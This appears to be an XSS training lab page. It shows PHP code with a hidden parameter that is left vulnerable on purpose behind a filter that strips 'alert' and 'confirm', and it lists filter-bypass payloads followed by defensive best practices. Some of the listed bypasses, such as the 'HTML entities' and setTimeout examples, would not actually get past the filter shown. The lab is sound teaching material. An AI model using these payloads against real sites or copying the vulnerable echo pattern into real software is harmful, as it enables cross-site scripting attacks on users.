Function Filtering XSS Lab

Test XSS with JavaScript function name filtering

Function Filtering Challenge

Lab Overview

This lab demonstrates function name filtering, where specific JavaScript function names are blocked while allowing other code execution.

Function Filtering: The application blocks specific JavaScript function names ('alert' and 'confirm') but allows other code execution.
Hidden Parameter: There's a hidden parameter not shown in the main form. Use tools like Arjun to discover it!
# use arjun tool to find hidden parameter
Function Filter: Blocks specific JavaScript function names
Blocked functions:
alert
confirm
Filter method: str_replace(array('alert','confirm'), '', $_GET['categoryid'])
Filter Demonstration:
Input: <script>alert(1)</script>
After filter: <script>(1)</script>
The 'alert' and 'confirm' strings are completely removed, which breaks the JavaScript syntax but can be bypassed.
Filter Complexity: Function Name Filtering

Objective: Bypass the function name filter and execute JavaScript code using alternative functions or obfuscation techniques.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["categoryid"])){
    $arr = array('alert','confirm');
    $re = str_replace($arr, '', $_GET['categoryid']);
    echo $re;
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameter
Hint: The 'categoryid' parameter is not shown in the main form but is implemented in the backend with function filtering.
This parameter filters out 'alert' and 'confirm' function names
Bypass Techniques for Function Filtering
Alternative Functions:
  • prompt(1) - Use prompt instead of alert
  • console.log(1) - Output to console
  • document.write(1) - Write to document
  • print() - Print dialog (if supported)
Function Obfuscation:
  • window['al'+'ert'](1) - String concatenation
  • eval('al'+'ert(1)') - Using eval
  • Function('al'+'ert(1)')() - Function constructor
  • setTimeout('alert(1)') - Using setTimeout
Advanced Bypass Techniques:
  • Use HTML entities: <script>alert(1)</script>
  • Use Unicode: <script>al\u0065rt(1)</script>
  • Use character codes: <script>String.fromCharCode(97,108,101,114,116)(1)</script>
  • Use alternative syntax: <script>top.alert(1)</script>
Security Implications

Function name filtering demonstrates:

  • Blocking specific function names is an ineffective security control
  • JavaScript provides multiple ways to execute the same functionality
  • Function name filtering can be easily bypassed with obfuscation
  • This approach provides a false sense of security
  • Proper output encoding is the only reliable defense
  • Content Security Policy (CSP) is necessary for real protection
Best Practices

For secure web applications:

  • Use context-aware output encoding, not function filtering
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Implement Trusted Types for DOM XSS protection
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
  • Conduct regular security testing and code reviews
Payload Examples for Function Filter Bypass
Alternative Functions:
  • <script>prompt(1)</script>
  • <script>console.log(1)</script>
  • <script>document.write(1)</script>
  • <script>document.title=1</script>
Function Obfuscation:
  • <script>window['al'+'ert'](1)</script>
  • <script>eval('al'+'ert(1)')</script>
  • <script>Function('al'+'ert(1)')()</script>
  • <script>setTimeout('alert(1)')</script>
Advanced Techniques:
  • <script>alert(1)</script> - HTML entities
  • <script>al\u0065rt(1)</script> - Unicode escape
  • <script>[].filter.constructor('al'+'ert(1)')()</script> - Array constructor
  • <script>location='javascript:alert(1)'</script> - Location redirect